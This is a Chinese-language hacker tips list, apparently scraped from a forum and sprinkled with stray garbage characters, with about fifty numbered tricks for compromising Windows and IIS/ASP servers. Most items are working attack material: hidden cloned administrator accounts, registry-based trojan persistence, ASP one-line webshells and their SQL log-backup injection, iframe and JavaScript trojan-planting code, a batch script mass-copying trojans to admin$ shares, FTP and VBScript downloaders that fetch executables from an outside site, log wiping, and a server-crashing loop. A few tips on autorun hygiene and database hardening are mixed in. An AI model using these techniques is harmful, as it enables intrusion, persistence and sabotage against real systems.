1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
; N$ T. k% V7 i$ N Mcacls C:\windows\system32 /G hqw20:R
* m4 L. _0 C; W) c" l思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入" a+ p) D/ M+ z6 ~
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
3 `% \' a( h" h! R7 @
. n( x: F) A# b/ D2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
8 I$ z7 v$ x3 Q* @! ]
2 `" w7 y* j. V5 s1 Z3 H: E3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。) F4 U+ Z' m5 `, i
( O3 c% }3 b% ~( R0 B5 Z" W7 V4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
! M& f8 e3 j/ F4 B& x$ K
, g/ f6 @0 A3 j( X! C5、利用INF文件来修改注册表
$ _' {& R V% d5 _3 S, V! v2 X# `[Version]
1 P) x8 r; p" Q0 R. D& }2 F3 L/ sSignature="$CHICAGO$"
S | { P7 T[Defaultinstall]
7 Z6 s' H" s( T {8 K" |addREG=Ating( j5 a' D* P: ]4 g+ V
[Ating]- V8 y2 _: s1 F; S/ b; D
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"& ]! Y; l: c% N9 C2 d8 m
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:" f$ K. v& ?# k1 ?8 [- w7 _
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
( k, V' p: R3 D& z) m其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
) I) A9 q* J, Z. @& x5 DHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
# G! F3 H, I3 `# j: S" BHKEY_CURRENT_CONFIG 简写为 HKCC
3 a& d" d6 ^7 H* ^8 V0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值' r, o" k8 f- q; }
"1"这里代表是写入或删除注册表键值中的具体数据' F. f' K: n! V: }! _4 ?. w$ i
8 o/ H# E; u/ w( X* o% z! D
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,+ h7 M& w8 F* e& M# g. ?9 {
多了一步就是在防火墙里添加个端口,然后导出其键值1 ]4 g0 k' c! `# {
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
! V% L( z. C+ `% v4 r9 j$ S. L
( d5 ^9 x2 y2 H9 ~- _" u7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
+ k/ z$ h8 @0 p! q8 O0 y4 K在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
8 |* W+ g$ v) X+ M. N2 N) h) E: T5 B$ N
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
3 ~8 r# d2 ^6 b* E J
A" [" Y. f* |8 m$ X9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
6 M: g3 B& L/ |0 V& g2 i% n可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。/ l7 t* k/ j' J4 w6 R
U3 q0 Z5 n! w; x
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”6 b* F; A0 v4 d3 X6 m% j5 P- ^
4 \+ c6 n) v: Y3 Y# `11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,& }# [* j1 ~2 ~
用法:xsniff –pass –hide –log pass.txt
$ ]! k* L$ \& E5 @& x$ Y$ l" C/ j$ l9 B7 C3 f
12、google搜索的艺术
0 {- Q! W* U0 @& C9 E* a搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”4 b4 \3 I( w( R3 D1 q! ^1 D
或“字符串的语法错误”可以找到很多sql注入漏洞。
( ^( v% m$ L6 V0 o4 j# Y
/ I4 p2 b! ]8 |1 o13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。. o2 r( |3 v, Q: G
1 v( K- ~1 _! D0 f+ K
14、cmd中输入 nc –vv –l –p 1987
# E9 t- q3 F2 @) t$ g做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃- t. h; Z7 p x. D$ {. t
4 U9 D) N9 _3 z1 @15、制作T++木马,先写个ating.hta文件,内容为
K- i; E* z2 Z1 c<script language="VBScript">
# ?+ Y; m$ w& K1 Q: P3 Yset wshshell=createobject ("wscript.shell" )
" e3 Q% e1 d# M/ b6 D9 {4 c. T7 na=wshshell.run("你马的名称",1)
* H4 k& G W) J- mwindow.close( ], p; U2 u3 t2 j8 C a$ \
</script>4 N+ h0 ]- E! A: g5 C4 d
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
2 C5 c- _. C9 \( }4 g7 m; |9 f
& P2 F% n! _# ^* D16、搜索栏里输入. `7 L. B6 I Y
关键字%'and 1=1 and '%'='
' e* ?5 u U# [' N3 L4 s. i7 B# {关键字%'and 1=2 and '%'='
6 _- J! h0 t. a: g8 ?$ p比较不同处 可以作为注入的特征字符# g1 n' [, V; r, m, C* O4 g
# ~# z" k3 \5 ~6 p17、挂马代码<html>
3 l1 F x/ U% r5 c. T. ~<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe># w" f/ C% j- {1 A6 u" R% v' ~
</html>
, M' G; {; y7 u# M1 D
; A4 h! g1 `. |; I1 K* N+ F18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,0 B1 m* P ]; L
net localgroup administrators还是可以看出Guest是管理员来。
* e" w2 w/ o; u) N. B9 Z9 C8 |- l1 W) |4 u- f, o' z
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
8 E6 q: [9 f8 u( s4 ~' F用法: 安装: instsrv.exe 服务名称 路径8 C: N, F0 r, k- Z( @( I
卸载: instsrv.exe 服务名称 REMOVE- i6 \: g: V R3 V4 t; C
0 s4 u( ~" {8 G( h2 Z# a8 G
$ u, h' V/ \, q* `! e; k
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
! H" I2 }4 U$ e0 n- d$ ?不能注入时要第一时间想到%5c暴库。6 J6 X1 c# e' \! I. G6 V g# ~! \ l
/ N( {9 A) g K4 I
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
, q+ T5 I+ d' o% {; _( {$ }
5 z5 ?& k) N$ f* D8 q+ U% x23、缺少xp_cmdshell时5 U% v! x2 W- c: K* s3 H
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
8 {0 o! X7 ?# G* y( h0 w/ @假如恢复不成功,可以尝试直接加用户(针对开3389的): q* c3 g5 u9 E5 A: F, X; i
declare @o int9 v- c: I5 F9 R, |5 d3 h
exec sp_oacreate 'wscript.shell',@o out
' q" [- X* M3 s) g1 @' Yexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
9 n) X7 J; d1 E7 X$ F, z
0 B5 `4 a" m* p2 g$ Y* s4 B24.批量种植木马.bat
3 ~- v5 {/ U X# Y$ b2 vfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中6 F$ f/ k( `3 N h
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
8 M m4 E2 V% l# U) M# a" {6 @" M7 }扫描地址.txt里每个主机名一行 用\\开头0 Q7 a6 K* |! {
3 ^! s; g# q2 b25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。3 x/ G O5 u' Y* L
4 a& A$ \3 Y) a, N9 ]/ {& I
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
. `& q7 g3 K3 P% x7 }将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.6 _" I* M7 o7 k" E$ {* V, v
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马: J9 {, }0 S7 p$ |5 W3 [
) K M' E. w) Z8 j9 G0 [0 `& i2 K
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
* d. y- ~+ n0 v6 x然后用#clear logg和#clear line vty *删除日志6 A2 ?) R4 G7 d% h. R" z: Q" H
; ^: P+ \& c! C& g9 t4 v5 y28、电脑坏了省去重新安装系统的方法) n& d( J! Y H7 j0 j0 J1 i
纯dos下执行,
9 u* e* q E Axp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
# ?+ j g8 U* G, `2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config, s& F' v1 _; I, | h& a
$ ]' I/ S5 D& j29、解决TCP/IP筛选 在注册表里有三处,分别是:
7 I( V+ N! u( G# }; s& g5 a0 @- T4 oHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip T [5 d, n1 ^- ?
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ D e, ~- |( w) p0 x5 n- q+ t$ dHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. z: ?+ T7 V3 N0 N1 ^6 [分别用
. F! @- _; Y+ z1 x7 e: c9 |regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 f `( ~, ~) o( z$ t
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
5 J" _7 U" V0 f, Rregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ o- R5 V6 D5 j# s: f
命令来导出注册表项3 ?* _! b0 [+ p" C0 z
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
) k' A- V/ h3 J2 j改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用# q% G5 x" [" W7 |( K
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
$ b) P. w/ s2 F/ `* Q
7 z& x" ]6 V1 U) G, C30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
6 k- _& T3 q8 \# E& A' Y1 oSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
) Z) w4 `& U v1 K3 x! S- m4 h7 q, W: g6 P2 i0 f% S
31、全手工打造开3389工具1 I2 n! y5 u1 n$ F4 k4 \* R9 x+ ]
打开记事本,编辑内容如下:. L9 U/ @3 u) m$ b4 Z% ^7 F
echo [Components] > c:\sql2 l/ K) b+ J4 Y4 q8 b
echo TSEnable = on >> c:\sql: Q2 l6 j; x( q& x% w% B
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
! \ Q9 F+ a5 z$ z; M$ u( H* @$ K8 x编辑好后存为BAT文件,上传至肉鸡,执行+ Q- O, Q$ y/ F, I
' N- S+ Y* w1 V# \1 d# {32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马0 S C( I- N/ b/ ?
9 m- |: ?, {( u" D& f( a1 P
33、让服务器重启
; a& ^* Q/ L$ P$ B) D写个bat死循环: v3 R8 F( U2 N, l- q
@echo off1 a! z8 H, \) [& |
:loop1 D8 l3 i5 i& t( e3 M1 _
cls! W0 n1 r+ h7 K# X; S
start cmd.exe
0 {1 x+ y' V( X/ B* a. j! K: ?0 Kgoto loop12 v5 b6 Y; }; K& J% t# l
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启7 F6 H) q# i$ r
$ G9 l+ J- J) L* ]8 L
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,8 Y$ d& A4 v2 z: o" C8 \7 q1 i
@echo off
3 g# [5 R. |" c. [date /t >c:/3389.txt
8 l, v. e( u( ]time /t >>c:/3389.txt. _+ _- K+ {- ~* T
attrib +s +h c:/3389.bat r! p, q4 R2 K" U. W% ~9 w8 L
attrib +s +h c:/3389.txt ~5 L$ `$ ]# i( u
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
& W6 ?7 T }* b5 g# K5 r. v并保存为3389.bat
9 A2 t- k" e! T7 w4 e打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号) k2 B9 ]# Z* @
6 q) \& K" t- _4 c5 K$ W8 ]) M& g2 Y, H
35、有时候提不了权限的话,试试这个命令,在命令行里输入:5 o5 `8 }* U9 a4 L5 W& ?
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
9 e* Y, {& |( r( @( S输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。* \% r0 J6 }( @% B! R, t
" W% M+ ~9 j- K, y- y36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件3 A! A6 s' s/ `, D) ^8 @' _
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址. U0 @' ^ ]0 Y
echo 你的FTP账号 >>c:\1.bat //输入账号
. @1 T* h' T" S- d7 |6 u2 techo 你的FTP密码 >>c:\1.bat //输入密码, f0 ` O: ~4 G2 m
echo bin >>c:\1.bat //登入9 b2 t) z& c6 a' S0 Z# C8 s
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么' j, ?$ H4 |( d: _ Z) {, Z4 _
echo bye >>c:\1.bat //退出
0 z! K+ f/ ]2 M6 c6 C" j2 l' c4 A( ?然后执行ftp -s:c:\1.bat即可
+ x4 ~# Z* }& t8 J( I$ J# s
* c; y: @7 r( m# c, g37、修改注册表开3389两法
0 t3 ]9 }+ i' H% G: n: S' @) A(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
" }3 d2 m4 z! Aecho Windows Registry Editor Version 5.00 >>3389.reg
9 |% N, V$ o/ R) `! ?- H1 k& necho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg$ q) H7 B# ]; l9 e7 Y5 K8 M+ K
echo "Enabled"="0" >>3389.reg
; _+ S( g$ B% m" y# \5 Oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows2 Z n$ G, g' _4 k& |& K( {- e
NT\CurrentVersion\Winlogon] >>3389.reg
' g; e* @# s* G% e% Techo "ShutdownWithoutLogon"="0" >>3389.reg
0 A3 {6 x0 W' m2 v6 V8 B9 L7 cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
0 j& n) b+ L4 g6 p; K>>3389.reg
! e" M( @3 K1 \. S; \echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg( H3 e' Z5 z9 K! p7 }* @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
9 ^# W$ P% l3 {& u>>3389.reg, p$ P+ n; J& `5 @. I+ y" D
echo "TSEnabled"=dword:00000001 >>3389.reg
( f+ a% x h. w! ^% }# _0 w6 r+ Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg! X) w7 X2 C! z0 q Q
echo "Start"=dword:00000002 >>3389.reg
$ |# d- @0 R& T2 C. y" vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]. M6 M$ h: \6 h/ J+ i
>>3389.reg
. J# _! {# I+ ~$ iecho "Start"=dword:00000002 >>3389.reg
( b V }) b- i9 Z. P* L# pecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
! V0 O5 F" v% L: _echo "Hotkey"="1" >>3389.reg! S) ]; S6 H* ]3 L X5 i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ z6 W. `, u' _/ P1 I" lServer\Wds\rdpwd\Tds\tcp] >>3389.reg% X) R/ q6 c& i
echo "PortNumber"=dword:00000D3D >>3389.reg
: ~: A) s5 J. T, U. Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, V# @ U F/ p* _* UServer\WinStations\RDP-Tcp] >>3389.reg
( W, u# Z% D+ ]9 secho "PortNumber"=dword:00000D3D >>3389.reg* s! z1 w* C! J
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
9 ]4 w: _3 \+ n0 i0 r( T(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)/ x6 j5 D6 X: U. C9 d& L
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效: h& Y: Y. g& x6 v
(2)winxp和win2003终端开启
5 L5 Y L; s; D: F; k+ j用以下ECHO代码写一个REG文件:
. P1 i; q& Y9 x+ Recho Windows Registry Editor Version 5.00>>3389.reg
' a4 T( C7 F# }& G' }( V1 ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( [8 }& t- d3 n; p9 O! B5 d6 JServer]>>3389.reg9 h7 q3 f0 f3 O# V, [- Z4 n
echo "fDenyTSConnections"=dword:00000000>>3389.reg4 J/ O- X5 @' s3 `; x- n8 y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ ]( l( b+ O$ y2 ?# |: PServer\Wds\rdpwd\Tds\tcp]>>3389.reg
" T' @9 V, ?, A& n. e; f# V0 @echo "PortNumber"=dword:00000d3d>>3389.reg; E% u) y! b' e- _0 P: {( @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, M3 `- }) w+ L5 S' pServer\WinStations\RDP-Tcp]>>3389.reg
' g5 j i0 V0 u" ^& E. |2 xecho "PortNumber"=dword:00000d3d>>3389.reg
8 C7 ?0 x! A4 y7 Y然后regedit /s 3389.reg del 3389.reg
, f6 {# \5 B7 S, T/ KXP下不论开终端还是改终端端口都不需重启
0 e6 h& ^' h3 G9 ^- B$ m# B" ]* N' x7 O* ~% B" c
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃: N. L7 q. @0 d+ z
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa', ]' W, A0 ?: i) Q g( D- S2 \, ~
8 A+ F1 ^2 ]! l) \39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
/ l5 x& k5 u; B. |(1)数据库文件名应复杂并要有特殊字符; ~) E! C9 S& i6 u& [
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源0 p, X* F" q6 v5 c& b0 F! _
将conn.asp文档中的4 m4 \# v6 M9 a
DBPath = Server.MapPath("数据库.mdb")0 ^7 E+ h6 O% d
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath3 A' i4 F' I% Q
7 [7 l- q$ R) Z
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
( }$ p; Q4 I% R p/ m9 k(3)不放在WEB目录里. n" u" E N3 y2 t
+ ~. u$ R8 Q+ u! P1 ^( E4 {' v* l7 b
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉4 h5 ^; X5 y- f6 I
可以写两个bat文件
! k7 r/ T$ n9 d V% N@echo off+ J3 L1 K2 D E @4 N
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe/ }% H+ ?$ u# v) }/ k
@del c:\winnt\system32\query.exe1 k! n1 B. k0 W. X8 G- d
@del %SYSTEMROOT%\system32\dllcache\query.exe* Z8 ? S8 e% B+ r/ e% P' ?+ r6 L E
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
2 }( [7 j# y- I$ u6 j; u, D/ a" s* Q3 O
@echo off
5 r+ P! q6 J K. E+ I7 ?@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
: I4 N- I0 u4 ~, Z# x/ A+ u@del c:\winnt\system32\tsadmin.exe1 y1 }( `" n8 l. V# L
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex! J A# ]/ I, B2 J4 m
" v& x) K* z3 T41、映射对方盘符0 u' `7 u9 J# C5 h+ ^* O
telnet到他的机器上,
2 M3 }9 q& P7 |/ m6 }& p/ o8 vnet share 查看有没有默认共享 如果没有,那么就接着运行
5 P" E/ B2 \( Q$ B+ Bnet share c$=c:
% t5 v6 m1 z, Z7 ~! |: {5 |/ ?net share现在有c$ j' s/ N. o3 V: h$ I5 I
在自己的机器上运行+ M- x+ C0 V, s Y0 B
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K' m+ Y {+ `4 F$ I( F
6 ~7 `& A+ z* D- q* O, e42、一些很有用的老知识7 ?1 W) S' g) L
type c:\boot.ini ( 查看系统版本 )
6 |2 Q9 m9 d: e! A F; inet start (查看已经启动的服务)
* W U; G4 l# Z$ Xquery user ( 查看当前终端连接 )$ G7 `7 p5 v- E
net user ( 查看当前用户 )
" f U( i1 F6 X$ ?) O, onet user 用户 密码/add ( 建立账号 )1 Q( B! C4 I$ d% y$ A9 a. m0 C
net localgroup administrators 用户 /add (提升某用户为管理员): Y* e9 a9 Z; z" N
ipconfig -all ( 查看IP什么的 ). c# h0 |$ [8 i
netstat -an ( 查看当前网络状态 )
# J& k# f J' m( y. L) gfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
0 ~5 t$ l$ F6 s克隆时Administrator对应1F45 A8 i) e8 ^, C( E9 ^: [9 b
guest对应1F5
& ^0 Q3 `. a# W T6 Vtsinternetuser对应3E8
4 b5 f1 z# w. r. }5 L( ~! }8 `" w( N5 R' K- N1 U4 C$ R+ l+ @
43、如果对方没开3389,但是装了Remote Administrator Service
* u; z$ E9 V" P% x4 _. a( Z P& b4 s$ F: @! v用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接2 t: c/ A/ j. g/ |& j9 c! h' X
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息! J* @7 {* |2 }
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"' M7 P8 _6 ]" b1 Y, v6 x
) B0 c+ _0 C* p9 `1 z5 s- _3 g
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
% S4 g4 a: }& H本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
7 L% x8 v6 D. B4 @- o5 f% N* ?
' l; c0 w( M. L. f: H45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)# m4 u) S: i/ \
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open. ~ n. \3 x. M+ K8 X1 L
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
. w9 B- M6 u: t" d" JCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
" f4 Y5 `: F3 K W$ ~1 [1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
" w% b4 g: {, f0 L1 l# P& s0 d(这是完整的一句话,其中没有换行符)2 H0 |& ^7 f* T' D9 B, o3 w
然后下载:9 K. z+ F% y' V! J( |* ?% f$ r. L
cscript down.vbs http://www.hack520.org/hack.exe hack.exe, v) d$ ?. W8 r8 f
% z8 ^# |5 S! x46、一句话木马成功依赖于两个条件:$ v% X v, g9 x: ~$ I7 K2 ?
1、服务端没有禁止adodb.Stream或FSO组件
( o. @6 e2 ]. \" {2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。8 D t! y* ?/ b1 D5 W( y. G2 m' F
* w& ?7 v4 R- V6 }! c- j( S47、利用DB_OWNER权限进行手工备份一句话木马的代码:
' F* M+ L ^. q/ I;alter database utsz set RECOVERY FULL--
9 J7 B9 U5 c, d: o/ ^& C;create table cmd (a image)--0 P* L# D. H: Q f4 [! y' ^3 d
;backup log utsz to disk = 'D:\cmd' with init--
! S- d4 U$ r! s# Z. _;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
* ]5 p8 y- ^3 I' O" I8 Z+ T+ I;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
7 ?/ m7 t! n9 c) O9 I! e注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
1 g% j* v! E8 v% s& q4 U; h$ m* h
+ S @8 ]; n; X48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置: J# I- k3 S4 ?; C( C
+ _( B2 q- {: n! Z, ~! W8 V; h! N! @
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options& }7 J) u) s9 ]' Q9 f: }6 V
所有会话用 'all'。2 P$ d% }$ S+ V
-s sessionid 列出会话的信息。
1 C; |! h% h& Z. C-k sessionid 终止会话。+ Q. q0 W% l" A2 F1 u
-m sessionid 发送消息到会话。* a( M) Y( E5 ]1 S1 e8 L
" h" j0 s+ Y+ l+ g
config 配置 telnet 服务器参数。
, Q# D2 g2 |" ?! N" H8 o2 c2 C' \; e/ @9 W! T0 \. i( H i4 C& p
common_options 为:2 Q% ]- S: _: Y" U* w
-u user 指定要使用其凭据的用户 Q+ |* l) n) x0 S- ~
-p password 用户密码
8 P* b, v% n, J* s
0 J1 t: o" R0 L1 hconfig_options 为:
/ D- v' e6 d+ n/ j# W# Ddom = domain 设定用户的默认域& n% X4 \2 |* z/ e/ ?* m, I
ctrlakeymap = yes|no 设定 ALT 键的映射! x1 q; m$ C% A) t
timeout = hh:mm:ss 设定空闲会话超时值4 O# b; p. _5 q
timeoutactive = yes|no 启用空闲会话。
. h b, E0 A5 Q3 j$ y2 r$ Fmaxfail = attempts 设定断开前失败的登录企图数。9 e9 p' D+ k* f) R! ?; N
maxconn = connections 设定最大连接数。
- Z7 n+ m) J& {2 mport = number 设定 telnet 端口。+ B7 i6 }& B1 p' t. b
sec = [+/-]NTLM [+/-]passwd
1 U( ~8 N+ u ~8 j" Z& d设定身份验证机构
% e6 n" F1 T( C: f4 G5 }* zfname = file 指定审计文件名。; O0 o* ^+ W; H1 b' Q, x
fsize = size 指定审计文件的最大尺寸(MB)。) b/ D5 a3 P U4 h9 X1 e
mode = console|stream 指定操作模式。
: _7 ?# e& ?4 L/ R% H6 w `auditlocation = eventlog|file|both# ]! M& g. U( I/ T7 D9 p/ S
指定记录地点/ k3 P8 [! l% T1 a
audit = [+/-]user [+/-]fail [+/-]admin
& I+ N5 ~" C: O% f5 H' R$ `( r; n0 H" R7 K9 H
49、例如:在IE上访问:% V+ \. `) g$ n/ x
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
3 t7 @' n6 k0 K, }7 i* Fhack.txt里面的代码是:& |: P4 Z; R+ M M o4 J
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">" r0 i3 T# M* z" U: h
把这个hack.txt发到你空间就可以了!
/ R. p. _0 {2 ?# v6 E* o# R i这个可以利用来做网马哦!
: ^! t$ B: Q% a# c2 z
# h. h4 x# `8 ]1 \ u/ ~! `50、autorun的病毒可以通过手动限制!$ c) Y4 _0 t/ }4 {- d Y7 P, e m
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
' t* W: `. q+ z5 L2,打开盘符用右键打开!切忌双击盘符~0 u& m$ h) `, |5 {
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
* G A6 N+ e9 ~5 e& S9 B! @; R E# K1 I; G" _0 f4 L6 q2 Z# R
51、log备份时的一句话木马:
; y. K$ i( `% K/ e7 Z/ m/ S( @a).<%%25Execute(request("go"))%%25>
- ?9 q1 K3 h: I9 S6 H, db).<%Execute(request("go"))%>
+ a+ B' _+ c5 ?c).%><%execute request("go")%><%
# _3 L! I; }( B4 V. v$ W6 m& qd).<script language=VBScript runat=server>execute request("sb")</Script>1 ]2 q, z. b; r
e).<%25Execute(request("l"))%25>' r0 g9 a2 A* F- y5 t5 [7 i
f).<%if request("cmd")<>"" then execute request("pass")%>
/ L+ z7 c. l& Q6 |. d1 J
# \: a4 D9 [3 F+ Y* @52、at "12:17" /interactive cmd
! [* s5 z8 q. L5 e执行后可以用AT命令查看新加的任务) D1 c" o @2 v+ F' g, P* \; x" Q
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
% O& `; _5 G9 b+ P
